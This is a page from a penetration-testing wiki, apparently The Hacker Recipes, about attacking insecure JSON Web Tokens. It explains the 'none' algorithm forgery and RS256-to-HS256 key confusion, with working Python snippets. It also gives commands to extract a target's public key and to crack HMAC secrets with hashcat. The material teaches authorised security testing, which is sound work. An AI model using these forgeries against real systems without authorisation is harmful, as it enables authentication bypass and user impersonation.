The Hacker Recipes
GitHubTwitterDonate
Search…
Introduction
Active Directory
Reconnaissance
Movement
Persistence
Web services
Reconnaissance
Configuration
Accounts and sessions
User inputs
🛠️ File inclusion
SQL injection
XSS (Cross-Site Scripting)
Unrestricted file upload
CSRF (Cross-Site Request Forgery)
🛠️ HTTP parameter pollution
IDOR (Insecure Direct Object Reference)
Open redirect
Insecure JSON Web Tokens
Insecure Cookies
🛠️ SSTI (Server-Side Template Injection)
🛠️ Insecure deserialization
SSRF (Server-Side Request Forgery)
XXE injection
🛠️ CRLF injection
HTTP response splitting
🛠️ Arbitrary file download
🛠️ Directory traversal
🛠️ Null-byte injection
🛠️ Content-type juggling
Systems & services
Reconnaissance
Movement
Privilege escalation
Pivoting
🛠️ Physical
Locks
Networking
Machines
Super secret zones
🛠️ Intelligence gathering
CYBINT
OSINT
GEOINT
🛠️ RADIO
RFID
Bluetooth
Wi-Fi
Wireless keyboard/mouse
🛠️ binary exploitation
Use-after-free
Buffer overflow
🛠️ mobile apps
Android
iOS
Powered By GitBook
Insecure JSON Web Tokens

Theory

Some web applications rely on JSON Web Tokens (JWTs) for stateless authentication and access control instead of stateful ones with traditional session cookies. Some implementations are insecure and allow attackers to bypass controls, impersonate users, or retrieve secrets.

Practice

Testers need to find if, and where, the tokens are used. A JWT is a base64 string of at least 100 characters, made of three parts (header, payload, signature) separated by dot, and usually located in Authorization headers with the Bearer keyword. See the the following example.
1
Authorization: Bearer eyJ0eXAiOiJKV1Q[...].eyJpc3MiOiJodHRwO[...].HAveF7AqeKj-4[...]
Copied!
Once the tokens are found, testers need to assess their implementation's security by attempting some known attacks and flaws.

Sensitive data

JWTs are just base64 encoded data. They may contain sensitive unencrypted information.

Signature attack - None algorithm

Testers need to decode the token, change the algorithm to None (or none, NONE, nOnE) in the header, remove the signature, and send the modified token. Some applications are vulnerable to this attack since some support a None algorithm for signature.
This can be done in Python.
1
import jwt
2
old_token = 'eyJ0eXAiOiJKV1Q[...].eyJpc3MiOiJodHRwO[...].HAveF7AqeKj-4[...]'
3
old_token_payload = jwt.decode(old_token, verify=False)
4
new_token = jwt.encode(old_token_payload, key='', algorithm=None)
5
print(new_token)
Copied!
If the token is accepted by the web app, it means the payload can be altered.
1
import jwt
2
payload = {'key1':'value1', 'key2':'value2'}
3
token = jwt.encode(payload, key='', algorithm=None)
4
print(token)
Copied!

Signature attack - RS256 to HS256

If the algorithm used to sign the payload is RS256, testers can try to use HS256 instead. Instead of signing the JWT payload with a private key, using HS256 will make the web app sign it with a public key that can sometimes be easily obtained.
Some applications re-use their TLS certificate for JWT operations. The TLS certificate's public key used by a server can be obtained with the following command.
1
echo | openssl s_client -connect $TARGET:443 | openssl x509 -pubkey -noout > pubkey.pem
Copied!
The following Python code can be used to identify if the web application is vulnerable to this attack.
1
import jwt
2
old_token = 'eyJ0eXAiOiJKV1Q[...].eyJpc3MiOiJodHRwO[...].HAveF7AqeKj-4[...]'
3
old_token_payload = jwt.decode(old_token, verify=False)
4
public_key = open('pubkey.pem', 'r').read()
5
new_token = jwt.encode(old_token_payload, key=public_key, algorithm='HS256')
6
print(new_token)
Copied!
If the token is accepted by the web app, it means the payload can be altered.
The jwt library imported in the following Python code raises an exception when attempting to use an asymmetric key or x509 certificate as an HMAC secret. Testers need to install version 0.4.3 pip/pip3 install pyjwt==0.4.3.
1
import jwt
2
public_key = open('pubkey.pem', 'r').read()
3
payload = {'key1':'value1', 'key2':'value2'}
4
token = jwt.encode(payload, key=public_key, algorithm='HS256')
5
print(token)
Copied!

Cracking the secret

When JWT use HMAC-SHA256/384/512 algorithms to sign the payload, tester can try to find the secret used if it weak enough. JWT cracker (JavaScript) and JWT tool (Python) are tools that testers can use to bruteforce JWT secrets.
JWT secrets can also be cracked using hashcat (see the AD credential cracking page for more detailed info on how to use it).
1
hashcat --hash-type 16500 --attack-mode 0 $JWTs_file $wordlist_file
Copied!

Recovering the public key

In certain scenarios, public keys can be recovered when knowing one (for algos ES256, ES384, ES512) or two (for algos RS256, RS384, RS512) tokens.
This can be achieved with the following Python script : JWT-Key-Recover

References

Attacking JWT authentication
Sjoerd Langkemper
Critical vulnerabilities in JSON Web Token libraries
Auth0 - Blog
https://blog.imaginea.com/stateless-authentication-using-jwt-2/
blog.imaginea.com
PayloadsAllTheThings/JSON Web Token at master · swisskyrepo/PayloadsAllTheThings
GitHub
JWT.IO
Previous
Open redirect
Next
Insecure Cookies
Last modified 8mo ago
Copy link
Edit on GitHub
Contents
Theory
Practice
Sensitive data
Signature attack - None algorithm
Signature attack - RS256 to HS256
Cracking the secret
Recovering the public key
References